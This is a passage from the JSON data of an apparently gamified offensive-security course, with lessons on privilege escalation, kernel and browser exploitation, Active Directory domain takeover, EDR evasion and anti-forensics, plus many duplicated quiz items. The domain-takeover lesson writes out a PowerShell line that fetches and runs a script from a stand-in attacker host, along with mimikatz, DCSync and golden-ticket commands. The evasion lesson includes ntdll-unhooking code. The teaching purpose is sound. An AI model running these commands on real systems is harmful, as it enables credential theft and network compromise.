DC\n\n# 4. Use the ticket\nexport KRB5CCNAME=administrator.ccache\nimpacket-psexec -k -no-pass TARGETCOMP.domain.local"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"RBCD abuse requires write access to which attribute?","opts":["userAccountControl","msDS-AllowedToActOnBehalfOfOtherIdentity","servicePrincipalName","adminCount"],"ans":1},{"type":"quiz","q":"By default, domain users can create how many computer accounts?","opts":["0","5","10","Unlimited"],"ans":2},{"type":"quiz","q":"S4U2Proxy allows...","opts":["Password cracking","Requesting service tickets on behalf of another user","DNS resolution","File encryption"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"exploit-kernel-exploit-dev","cat":"Exploitation","title":"Linux Kernel Exploit Development","diff":3,"xp":300,"intro":"Find and exploit a kernel vulnerability: from crash to root shell.","sections":[{"type":"text","content":"Kernel exploitation: trigger a bug (UAF, race condition, OOB write) in kernel space to corrupt kernel data structures, gain arbitrary read/write, then overwrite your process's credential structure to set uid=0. One wrong move = kernel panic."},{"type":"code","lang":"c","content":"// Simplified kernel exploit flow:\n// 1. Trigger the bug (e.g., UAF in a syscall)\nint fd = open(\"/dev/vulnerable\", O_RDWR);\nioctl(fd, VULN_FREE, buffer);  // free the object\n// 2. Reclaim the freed memory with controlled data\n// Spray kernel heap to reclaim the slot\nfor (int i = 0; i < 100; i++)\n    sendmsg(sock, &msg, 0);  // heap spray with msg_msg\n// 3. Use the dangling reference to read/write kernel memory\nioctl(fd, VULN_USE, buffer);  // UAF: uses freed (now controlled) memory\n// 4. Overwrite current->cred to set uid=0\n// commit_creds(prepare_kernel_cred(0))\n// 5. Drop to root shell\nexecl(\"/bin/sh\", \"sh\", NULL);"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"A kernel UAF exploit reclaims freed memory with...","opts":["Malloc","Kernel heap spraying (e.g., sendmsg)","Stack overflow","Brute force"],"ans":1},{"type":"quiz","q":"commit_creds(prepare_kernel_cred(0)) does what?","opts":["Crashes the kernel","Sets the current process to root (uid=0)","Encrypts the filesystem","Resets the password"],"ans":1},{"type":"quiz","q":"Why is kernel exploitation dangerous to test?","opts":["It's slow","A wrong move causes a kernel panic (system crash)","It needs a GUI","It requires network access"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"exploit-browser-exploitation","cat":"Exploitation","title":"Browser Exploitation Fundamentals","diff":3,"xp":300,"intro":"Exploit JavaScript engine bugs for code execution in the browser.","sections":[{"type":"text","content":"Modern browser exploits chain multiple bugs: a renderer bug (V8/SpiderMonkey type confusion, JIT bug) gives code execution in the sandbox, then a sandbox escape (IPC bug, GPU process exploit) breaks out. This is nation-state level work."},{"type":"code","lang":"javascript","content":"// Conceptual V8 exploitation flow:\n// 1. Type confusion: make V8 treat an object as a different type\n// 2. Get out-of-bounds read/write on the V8 heap\n// 3. Build arbitrary read/write primitives\n// 4. Overwrite a JIT-compiled function's code\n// 5. Execute shellcode\n\n// Real exploits use:\n// - ArrayBuffer corruption for R/W primitives\n// - WebAssembly for RWX memory (JIT pages)\n// - Wasm instance's imported_function_targets\n//   to redirect control flow\n\n// Sandbox escape requires a SECOND bug:\n// - IPC deserialization flaw\n// - GPU process vulnerability\n// - Mojo interface bug"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Browser exploit chains typically need...","opts":["One bug","At least two bugs: renderer + sandbox escape","Physical access","Network access"],"ans":1},{"type":"quiz","q":"V8 type confusion allows...","opts":["XSS","Treating objects as wrong types for OOB memory access","Cookie theft","DNS hijacking"],"ans":1},{"type":"quiz","q":"WebAssembly is useful in exploits because...","opts":["It's slow","JIT-compiled Wasm creates RWX memory pages","It's encrypted","It uses sandboxing"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"postexploit-domain-dominance","cat":"Post-Exploitation","title":"Full Domain Dominance Playbook","diff":3,"xp":300,"intro":"From initial foothold to owning every machine in the domain.","sections":[{"type":"text","content":"The playbook: initial access (phishing) -> establish C2 -> local privesc -> credential harvesting -> lateral movement -> find domain admin path (BloodHound) -> DCSync/Golden Ticket -> persistence across the forest. Each step has multiple techniques; adapt based on what you find."},{"type":"code","lang":"bash","content":"# Phase 1: Foothold + local privesc\nwhoami /all && systeminfo\n# Upload WinPEAS or run PowerUp\npowershell -ep bypass -c 'IEX(New-Object Net.WebClient).DownloadString(\"http://attacker/PowerUp.ps1\"); Invoke-AllChecks'\n\n# Phase 2: Credential harvest\nmimikatz# sekurlsa::logonpasswords\nmimikatz# lsadump::sam\n\n# Phase 3: Lateral movement\ncrackmapexec smb 10.10.10.0/24 -u admin -H hash --sam\nimpacket-psexec admin@target -hashes :hash\n\n# Phase 4: Domain dominance\nimpacket-secretsdump domain.local/admin:pass@DC -just-dc\nmimikatz# lsadump::dcsync /user:krbtgt\nmimikatz# kerberos::golden /user:admin /domain:domain.local /krbtgt:HASH /ptt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"What is the first thing to do after initial access?","opts":["Delete logs","Establish persistence and enumerate the local system","Launch ransomware","Attack other companies"],"ans":1},{"type":"quiz","q":"DCSync gives you...","opts":["Network access","Every password hash in the domain","Firewall rules","Physical access"],"ans":1},{"type":"quiz","q":"Why get the krbtgt hash specifically?","opts":["It's the admin password","It lets you forge Golden Tickets (any identity in the domain)","It decrypts files","It disables antivirus"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"postexploit-av-edr-evasion","cat":"Post-Exploitation","title":"Advanced AV/EDR Evasion","diff":3,"xp":300,"intro":"Bypass modern endpoint protection to execute your payload.","sections":[{"type":"text","content":"Modern EDR hooks ntdll syscalls, monitors ETW, and uses behavioral analysis. Evasion: direct syscalls (SysWhispers), unhooking ntdll, PPID spoofing, ETW patching, reflective loading, sleep obfuscation, and custom loaders that avoid known signatures."},{"type":"code","lang":"c","content":"// Direct syscall (bypass ntdll hooks)\n// Instead of: NtAllocateVirtualMemory (hooked by EDR)\n// Use: syscall instruction directly with the SSN\n\n// SysWhispers approach:\nNTSTATUS status;\nstatus = NtAllocateVirtualMemory_Syscall(\n    GetCurrentProcess(),\n    &baseAddr,\n    0, &size,\n    MEM_COMMIT | MEM_RESERVE,\n    PAGE_EXECUTE_READWRITE\n);\n\n// Unhooking: read clean ntdll from disk, overwrite hooked version\nHANDLE hFile = CreateFileA(\"C:\\Windows\\System32\\\\ntdll.dll\", ...);\n// Map it and replace the .text section of the loaded ntdll"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"EDR hooks are placed in...","opts":["The kernel only","ntdll.dll user-mode API functions","The network stack","Registry"],"ans":1},{"type":"quiz","q":"Direct syscalls bypass EDR by...","opts":["Encrypting traffic","Calling the kernel directly without going through hooked ntdll","Disabling the EDR service","Using DNS"],"ans":1},{"type":"quiz","q":"ETW patching prevents...","opts":["File access","EDR from receiving telemetry events","Network connections","Registry access"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"crypto-side-channel-attacks","cat":"Cryptography","title":"Side-Channel Attacks: Power, EM, and Cache","diff":3,"xp":300,"intro":"Extract cryptographic keys by measuring physical properties during computation.","sections":[{"type":"text","content":"Side channels leak secrets through physics: power consumption varies with the Hamming weight of processed data (DPA), electromagnetic emissions correlate with key bits (EM attack), and CPU cache timing reveals memory access patterns (Flush+Reload, Prime+Probe). Spectre and Meltdown are cache side-channel attacks."},{"type":"code","lang":"python","content":"# Cache timing attack concept (Flush+Reload)\nimport time\n\ndef time_access(addr):\n    start = time.perf_counter_ns()\n    _ = memory[addr]  # access the memory\n    return time.perf_counter_ns() - start\n\n# 1. FLUSH: evict target address from cache\nclflush(target_addr)\n# 2. Wait for victim to (maybe) access the same address\ntime.sleep(0.001)\n# 3. RELOAD: time the access\nt = time_access(target_addr)\n# Fast access = victim loaded it (cache hit) = that code path was taken\n# Slow access = victim didn't load it (cache miss)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"DPA attacks measure...","opts":["Network traffic","Power consumption during cryptographic operations","File sizes","Memory usage"],"ans":1},{"type":"quiz","q":"Spectre exploits which side channel?","opts":["Power","Electromagnetic","CPU cache timing","Network latency"],"ans":2},{"type":"quiz","q":"Flush+Reload detects victim behavior by...","opts":["Reading their memory directly","Measuring if they loaded a specific cache line","Intercepting network traffic","Monitoring system calls"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"forensics-anti-forensics","cat":"Forensics & IR","title":"Anti-Forensics Detection & Counter-Techniques","diff":3,"xp":300,"intro":"Attackers hide their tracks. Learn to detect the concealment.","sections":[{"type":"text","content":"Anti-forensics: timestomping (modify file timestamps), log clearing, fileless malware (lives in registry/WMI), data destruction (secure delete), steganography, and encrypted C2. Detecting anti-forensics is harder than detecting the attack itself."},{"type":"code","lang":"bash","content":"# Detect timestomping: compare $STANDARD_INFORMATION vs $FILE_NAME timestamps\n# $SI timestamps are easily modified; $FN timestamps are harder\n# If $SI shows 2015 but $FN shows 2024 -> timestomped\nMFTECmd.exe -f $MFT --csv output\n# Look for: SI_Created != FN_Created\n\n# Detect log clearing\n# Event ID 1102: audit log cleared (the clearing itself is logged!)\nGet-WinEvent -FilterHashtable @{LogName='Security';ID=1102}\n# Event ID 104: system log cleared\n\n# Detect fileless malware\n# Check WMI subscriptions\nGet-WMIObject -Namespace rootsubscription -Class __EventFilter\n# Check PowerShell script block logging (4104)\n# Check registry Run keys for encoded payloads"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Timestomping modifies which timestamps?","opts":["$FILE_NAME only","$STANDARD_INFORMATION (the easily accessible ones)","Both equally","Neither"],"ans":1},{"type":"quiz","q":"When Windows audit logs are cleared, which event is logged?","opts":["No event","Event ID 1102","Event ID 4624","Event ID 7045"],"ans":1},{"type":"quiz","q":"Fileless malware persists in...","opts":["Executable files","Registry, WMI, or memory (not files on disk)","The boot sector","USB drives"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability 